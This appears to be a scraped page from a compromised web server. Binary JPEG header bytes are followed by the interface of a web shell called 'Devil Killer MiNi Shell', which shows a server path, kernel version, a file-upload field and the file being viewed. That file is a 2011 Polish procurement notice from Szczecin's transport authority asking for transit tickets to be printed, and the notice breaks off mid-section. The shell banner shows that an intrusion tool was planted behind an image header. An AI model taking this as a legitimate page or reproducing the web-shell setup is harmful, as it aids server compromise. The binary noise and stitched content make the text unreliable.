JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111123/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111123/306037-N-2011.html

<p class="kh_header"><b>Szczecin: Druk i dostawa biletów miesięcznych, 3 miesięcznych, semestralnych, dobowych, wielodobowych, 10 przejazdowych, rodzinnych, grupowych, blankietów do biletów na rok 2012 i 2013 (I kwartał)</b><br>
<b>Numer ogłoszenia: 306037 - 2011; data zamieszczenia: 23.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Szczecin - Zarząd Dróg i Transportu Miejskiego , ul. Klonowica 5, 71-241 Szczecin, woj. zachodniopomorskie, tel. 091 4800444,4800434, faks 091 4393003, 4800453.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zditm.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Druk i dostawa biletów miesięcznych, 3 miesięcznych, semestralnych, dobowych, wielodobowych, 10 przejazdowych, rodzinnych, grupowych, blankietów do biletów na rok 2012 i 2013 (I kwartał).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Druk i dostawa biletów miesięcznych, 3 miesięcznych, semestralnych, dobowych, wielodobowych, 10 przejazdowych, rodzinnych, grupowych, blankietów do biletów na rok 2012 i 2013 (I kwartał). 
Zakres rzeczowy i szacunek ilościowy:
1. BILETY  MIESIĘCZNE   drukowane  w  9  nominałach  (szacunkowa ilość - 847 800 szt.)                               
na linie zwykłe w 4 nominałach,
na linie pospieszne w 5 nominałach,
1)  DANE  TECHNICZNE:
a)papier offset o gramaturze 120-150 g/m2,
b)wymiary biletu 40 mm x 70 mm,
c)w arkuszach po 10 szt.,
d)arkusze z perforacją pionową i poziomą,
e)podział na dni miesiąca,
f)na rewersie nadrukowana treść :  
-Bilet ważny od dnia wyznaczonego do dnia poprzedzającego ten dzień w miesiącu następnym do godz. 24.00. Bilet ważny jest razem z blankietem (ten zapis nie dotyczy biletów o nominale 150,00 zł Na Okaziciela),
-www.zditm.szczecin.pl
g)awers biletu drukowany w pełnej gamie kolorów i odcieni. Zamawiający wymaga wyróżnienia kolorów biletów zwykłych od pośpiesznych, wzory i kolory uzgadniane co miesiąc z Zamawiającym, logo  zamawiającego  umieszczone na awersie biletu,
h)zabezpieczony przed kopiowaniem elektronicznym, zawierać będzie między innymi:
-hologram  typu Hot stamping o rozmiarach do 1 x 1 cm i w kształcie uzgodnionym z Zamawiającym (kształt zmieniany co 2 m-ce),
-rok, miesiąc i cenę zabezpieczone farbą fluorescencyjną w kolorach uzgodnionych z Zamawiającym,
-mikrodruk wg szczegółowych późniejszych ustaleń z Zamawiającym,
-wyraźny, równo wypełniony farbą siedmiocyfrowy numer biletu wykonany farbą  w kolorze wg szczegółowych późniejszych ustaleń z Zamawiającym.
2. BILETY  TRZYMIESIĘCZNE   drukowane  w 8  nominałach  (szacunkowa ilość - 48 800 szt.)
-na linie zwykłe w 4 nominałach ,
-na linie pospieszne w 4 nominałach, 
1)DANE  TECHNICZNE:
a)papier offset o gramaturze 120 -150 g/m2,
b)wymiary biletu  40 mm x 70 mm,
c)w arkuszach po 10 szt.,
d)arkusze z perforacją pionową i poziomą,
e)podział na 12 miesięcy,
f)awers biletu drukowany w pełnej gamie kolorów i odcieni,
g)rewers  drukowany w 2 kolorach,
h)logo zamawiającego umieszczone na awersie biletu,
i)zabezpieczony przed kopiowaniem elektronicznym, zawierać będzie między innymi:
-hologram typu Hot stamping o rozmiarach do 1 x 1 cm i w kształcie uzgodnionym z Zamawiającym, 
-cenę i rok zabezpieczone farbą fluorescencyjną,
-mikrodruk wg szczegółowych późniejszych ustaleń z Zamawiającym,
-wyraźny, równo wypełniony farbą siedmiocyfrowy numer biletu wykonany farbą  w kolorze wg szczegółowych późniejszych ustaleń z Zamawiającym.

3. BILETY  SEMESTRALNE  -  4-miesięczne drukowane  w 4  nominałach  (szacunkowa ilość - 7 300 szt.):
-na linie zwykłe  w 2 nominałach,
-na linie pospieszne w 2 nominałach,
1)  DANE TECHNICZNE:
a)papier o gramaturze 120 -150 g/m2,
b)wymiary biletu 40 mm x 70 mm,
c)w arkuszach po 10 szt.,
d)arkusze z perforacją pionową i poziomą,
e)podział na 12 miesięcy,
f)awers biletu drukowany w pełnej gamie kolorów i odcieni,
g)rewers drukowany w 2 kolorach,
h)logo zamawiającego umieszczone na awersie biletu,
i)zabezpieczony przed kopiowaniem elektronicznym, zawierać będzie między innymi:
-hologram typu Hot stamping o rozmiarach do 1 x 1 cm i w kształcie uzgodnionym z Zamawiającym,
-cenę i rok zabezpieczone farbą fluorescencyjną,
-mikrodruk wg szczegółowych późniejszych ustaleń z Zamawiającym,
-wyraźny, równo wypełniony farbą siedmiocyfrowy numer biletu wykonany farbą  w kolorze wg szczegółowych późniejszych ustaleń z Zamawiającym.

4. BILETY   SEMESTRALNE - 5-miesięczne  drukowane  w  4  nominałach  (szacunkowa ilość - 10 300 szt.): 
-na linie zwykłe  w 2 nominałach,
-na linie pospieszne w 2 nominałach,
1)  DANE TECHNICZNE:
a)papier o gramaturze 120 -150 g/m2,
b)wymiary biletu 40 mm x 70 mm,
c)w arkuszach po 10 szt.,
d)arkusze z perforacją pionową i poziomą,
e)podział na 12 miesięcy,
f)awers biletu drukowany w pełnej gamie kolorów i odcieni,
g)rewers drukowany w 2 kolorach,
h)logo zamawiającego umieszczone na awersie biletu,
i)zabezpieczony przed kopiowaniem elektronicznym, zawierać będzie między innymi:
-hologram typu Hot stamping o rozmiarach do 1 x 1 cm i w kształcie uzgodnionym z Zamawiającym, 
-cenę i rok zabezpieczone farbą fluorescencyjną,
-mikrodruk wg szczegółowych późniejszych ustaleń z Zamawiającym,
-wyraźny, równo wypełniony farbą siedmiocyfrowy numer biletu wykonany farbą  w kolorze wg szczegółowych późniejszych ustaleń z Zamawiającym.
      
5. BILETY  DOBOWE   -drukowane  w  2  nominałach  (szacunkowa ilość - 750 000 szt.)         
1)  DANE  TECHNICZNE:
a)papier offset o gramaturze  80 g/m2,  
b)wymiary biletu 75 mm x 35 mm,
c)sklejone grzbietem w bloczkach po 100 szt.,
d)awers biletu drukowany w pełnej gamie kolorów i odcieni, 
e)rewers biletu drukowany w 2 kolorach, na rewersie nadrukowana treść:
-Bilet ważny przez 24  godziny  od chwili skasowania.
-Bilet na okaziciela.
-Bilet na linie zwykłe, pospieszne i nocne.
-W sprawach spornych uwzględnia się datę i czas drukowany przez kasownik.
f)logo zamawiającego,
g)zabezpieczony przed kopiowaniem technikami elektronicznymi będzie zawierać:
-serię i siedmiocyfrowy numer biletu zabezpieczone farbą fluorescencyjną, seria i numer wyraźny, równo wypełniony farbą,
-mikrodruk wg szczegółowych późniejszych ustaleń z Zamawiającym,
-hologram typu Hot stamping o rozmiarach do 0,3 x 3,5 cm,
-na rewersie gilosz umieszczony na polu kasowania.

6. BILETY  WIELODOBOWE - drukowane  w  6  nominałach (szacunkowa ilość - 46 000 szt.).          
1)  DANE  TECHNICZNE:
h)papier offset o gramaturze  130-150 g/m2,  
i)wymiary biletu 75 mm x 35 mm,
j)sklejone grzbietem w bloczkach po 20 szt.,
k)awers biletu drukowany w pełnej gamie kolorów i odcieni, 
l)rewers biletu drukowany w 2 kolorach, na rewersie nadrukowana treść:
-Bilet ważny przez 120 lub 240  godzin (godziny) od chwili skasowania.
-Bilet na okaziciela.
-Bilet na linie zwykłe, pospieszne i nocne.
-W sprawach spornych uwzględnia się datę i czas drukowany przez kasownik.
m)logo zamawiającego,
n)zabezpieczony przed kopiowaniem technikami elektronicznymi będzie zawierać:
-serię i siedmiocyfrowy numer biletu zabezpieczone farbą fluorescencyjną, seria i numer wyraźny, równo wypełniony farbą,
-mikrodruk wg szczegółowych późniejszych ustaleń z Zamawiającym,
-hologram typu Hot stamping o rozmiarach do 0,3 x 3,5 cm,
-na rewersie gilosz umieszczony na polu kasowania.

7. KARNETY 10 - PRZEJAZDOWE  Z  UPUSTEM - drukowane   w   6 nominałach  (szacunkowa ilość - 309 700 szt.).
1) DANE  TECHNICZNE:
a)papier offset o gramaturze130-150 g/m2,
b)wymiary biletu 35 mm x 420 mm, przy czym wymiary kuponu kontrolnego wraz z biletem nr 10  wynoszą: 35 mm x 60 mm, a każdego następnego biletu w karnecie 35 mm x 40 mm,
c)sklejone w bloczkach po 100 szt.,
d)logo zamawiającego, 
e)zabezpieczony przed kopiowaniem technikami elektronicznymi będzie zawierać:
-serię i numer biletu zabezpieczone farbą fluorescencyjną (na każdym bilecie karnetu) i numer kolejny biletu w karnecie numerowany od ostatniego biletu karnetu do kuponu kontrolnego,
-mikrodruk wg szczegółowych późniejszych ustaleń z Zamawiającym,
-hologram typu Hot stamping o rozmiarach do 0,4 x 3,5 cm umieszczony na kuponie kontrolnym.

8.  BILETY  RODZINNE  WEEKENDOWE  (szacunkowa ilość - 6 000 szt.). 
1)  DANE  TECHNICZNE:
a)papier o gramaturze 80 g/m2, 
b)wymiary biletu 75 mm x 35 mm,
c)sklejone grzbietem w bloczkach po 20 szt.,
d)awers biletu drukowany w pełnej gamie kolorów i odcieni,
e)rewers biletu drukowany w 2 kolorach, na rewersie nadrukowana treść:
-Bilet ważny do 22.00 od chwili skasowania.
-Bilet na linie zwykłe i pospieszne.
-Bilet jednodniowy; może być wykorzystany w wybranym dniu  świątecznym, sobotę lub niedzielę.
-W sprawach spornych uwzględnia się datę i czas drukowany przez kasownik.
f)logo zamawiającego,
g)zabezpieczony przed kopiowaniem technikami elektronicznymi będzie zawierać:
-serię i siedmiocyfrowy numer biletu zabezpieczone farbą fluorescencyjną, seria i numer wyraźny, równo wypełniony farbą,
-mikrodruk wg szczegółowych późniejszych ustaleń z Zamawiającym,
-hologram typu Hot stamping o rozmiarach 0,3 lub 0,4 x 3,5 cm,
-na rewersie gilosz umieszczony na polu kasowania,

9. BILETY  GRUPOWE -  drukowane  w 2 rodzajach  (szacunkowa ilość - 12 000 szt.).
-do 15 osób + 1 opiekun,
-do 25 osób + 2 opiekunów,                                                     
1)  DANE  TECHNICZNE:
a)papier o gramaturze 80 g/m2,
b)wymiary biletu 75 mm x 35 mm,
c)sklejone grzbietem w bloczkach po 20 szt.,
d)awers biletu drukowany w pełnej gamie kolorów i odcieni,
e)rewers biletu drukowany w 2 kolorach, na rewersie nadrukowana treść:
-Bilet na okaziciela,
-Bilet na linie zwykłe i pospieszne,
-W sprawach spornych uwzględnia się datę i czas drukowany przez kasownik,
f)logo zamawiającego,
g)zabezpieczony przed kopiowaniem technikami elektronicznymi będzie zawierać:
-serię i siedmiocyfrowy numer biletu zabezpieczone farbą fluorescencyjną, seria i numer wyraźny, równo wypełniony farbą,
-mikrodruk wg szczegółowych późniejszych ustaleń z Zamawiającym,
-hologram typu Hot stamping o rozmiarach 0,3 lub 0,4 x 3,5 cm,
-na rewersie gilosz umieszczony na polu kasowania,

10. BLANKIETY DO BILETU OKRESOWEGO  - drukowane w 2 rodzajach (szacunkowa ilość -  32 800 szt.).                                                                                         
-blankiet do biletu okresowego na 1 linię,
-blankiet do biletu okresowego sieciowego,
1)  DANE  TECHNICZNE:
a)papier o gramaturze  - karton 250g/m2,
b)wymiary blankietu  93 mm x 54 mm,
c)logo zamawiającego,
d)	serię i siedmiocyfrowy numer biletu zabezpieczone farbą fluorescencyjną, seria i numer wyraźny, równo wypełniony farbą.

11. BILETY WOLNEJ  JAZDY - (szacunkowa ilość -  300 szt.).    
1)  DANE  TECHNICZNE:
a)	papier o gramaturze  - karton 250g/m2,
b)	wymiary biletu  86 mm x 54 mm,
c)	logo zamawiającego,
d)	siedmiocyfrowy numer biletu zabezpieczony farbą fluorescencyjną, numer wyraźny i równo wypełniony farbą,
e)	hologram  typu Hot stamping o rozmiarach do 1 x 1 cm i w kształcie uzgodnionym z Zamawiającym.

 12. WIZYTÓWKI - (szacunkowa ilość - 300 szt.).
1)  DANE  TECHNICZNE:
a)	papier o gramaturze  - karton 250g/m2,
b)	wymiary wizytówki   93 mm x 55 mm,
c)	logo zamawiającego.

II.  Warunki realizacji zamówienia:
1.	Wykonanie wszystkich nadruków musi być wyraźne i czytelne, nie pozostawiające  wątpliwości jaka to cyfra lub litera.
2.	Podane ilości poszczególnych rodzajów biletów, blankietów czy wizytówek mogą ulec zmianie w zależności od zapotrzebowania.
3.	Całkowita ilość dostarczonych biletów nie przekroczy 2 071 300 sztuk.
4.	W załączonych do SIWZ wzorach biletów Zamawiający zastrzega sobie prawo zmian np.: logo, nominału biletu, nazwę biletu itp. bez wpływu na cenę druku oferowaną przez Wykonawcę.
5.	Zamawiający będzie informował Wykonawcę o ewentualnych zmianach z wyprzedzeniem w terminach określonych w umowie.      
6.	Wzory wszystkich  biletów, legitymacji  zostaną szczegółowo  omówione  po podpisaniu umowy.
7.	Załączone wzory biletów mogą zostać zmodyfikowane przez wykonawcę po zaakceptowaniu przez zamawiającego.

REALIZACJA   PRZEDMIOTU   UMOWY

1.	Dostawy będą odbywać się sukcesywnie wg zamówień Zamawiającego, po wcześniejszym zgłoszeniu telefonicznie lub faksem (potwierdzonych pisemnie)  w terminie nie dłuższym niż  14 dni kalendarzowych od  złożenia  zapotrzebowania.
2.	Wykonawca  zobowiązuje się dostarczać przedmiot umowy do magazynu Zamawiającego, znajdującego się przy ul. S. Klonowica 5, 71-241 Szczecin.
3.	Do każdej przesyłki Wykonawca  zobowiązany jest dołączyć specyfikacje dostarczonej partii  przedmiotu umowy.
4.	Zamawiający jest zobowiązany do sprawdzenia  ilości i  jakości dostarczonego przedmiotu umowy oraz jego zgodności ze złożonym zapotrzebowaniem, niezwłocznie po otrzymaniu przesyłki.
5.	W przypadku stwierdzenia przez Zamawiającego braków ilościowych lub jakościowych w przesyłce, Wykonawca zobowiązuje się do usunięcia  ich na własny koszt  w  terminie  7 dni  kalendarzowych od chwili otrzymania zgłoszenia.
6.	Wykonanie wszystkich nadruków musi być czytelne , nie pozostawiające  wątpliwości jaka to cyfra lub litera.
7.	Całkowita ilość dostarczonych biletów nie przekroczy 2 071 300 sztuk.
8.	Podane ilości w  §  2   pkt   1 - 12)  umowy   mogą  ulec zmianie  (w poszczególnych rodzajach biletów)  w  zależności  od zapotrzebowania.          
9.	W załączonych wzorach biletów  Zamawiający  przewiduje  możliwość wprowadzenia  zmian, np.: logo, nominału biletu, nazwę biletu itp.,  nie wpłynie to na koszt druku biletu.
10.	Zamawiający będzie informował Wykonawcę o ewentualnych zmianach wymienionych w pkt 8 niniejszego paragrafu z minimum jednomiesięcznym wyprzedzeniem.           
11.	Wzory wszystkich  biletów, legitymacji  zostaną szczegółowo  omówione  przy podpisywaniu umowy.
12.	Załączone wzory biletów mogą zostać zmodyfikowane przez Wykonawcę po zaakceptowaniu przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielanie zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5, 79.82.30.00-9, 34.98.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy ubiegający się o udzielenie zamówienia muszą spełniać warunki dotyczące: posiadania wiedzy i doświadczenia.
Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonał (a w przypadku świadczeń okresowych lub ciągłych również wykonuje) należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum jedną usługę (pracę) podobną do objętych przedmiotem zamówienia.
Za usługę (pracę) podobną zamawiający uzna drukowanie biletów na rzecz organizatorów lub wykonawców komunikacji miejskiej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty wymagane przez zamawiającego:
1)	oferta cenowa zgodnie z Rozdziałem I pkt 3 siwz;
W przypadku składania oferty wspólnej należy złożyć jeden dokument
2)	odpowiednie pełnomocnictwa;
Tylko w sytuacjach określonych w Rozdziale I pkt 5 zdanie 2  siwz lub w przypadku składania oferty wspólnej (Rozdział III pkt 1 siwz)
3)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące część zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli wykonawca przewiduje udział podwykonawców);
W przypadku składania oferty wspólnej należy złożyć jeden dokument.
4)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące, że Wykonawca posiada system zabezpieczeń produkcji biletów i przechowywania papieru, w szczególności:
a)	system alarmowy włamania i napadu lub 24 godzinna ochrona przez wyspecjalizowane służby ochroniarskie,
b)	produkcja biletów na terenie jednego zamkniętego obiektu w celu zabezpieczenia i kontroli obiegu dokumentacji produkcyjnej, normowania materiałów nanoszenia zabezpieczeń biletów, rozliczania produkcji oraz nadzorowania niszczenia odpadów,
c)	kontrolę wewnętrzną produkcji i ciągów technologicznych produkcji biletów.
W przypadku składania oferty wspólnej należy złożyć jeden dokument
5)	Wzory biletów wykonywanych dla innych odbiorców, zawierających hologram,
W przypadku składania oferty wspólnej należy złożyć jeden dokument
6)	Dokumenty poświadczające zastrzeżenie hologramu (rejestracja w Międzynarodowym Stowarzyszeniu Producentów Hologramów, lub rejestracja w Urzędzie Patentowym).
             W przypadku składania oferty wspólnej należy złożyć jeden dokument</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
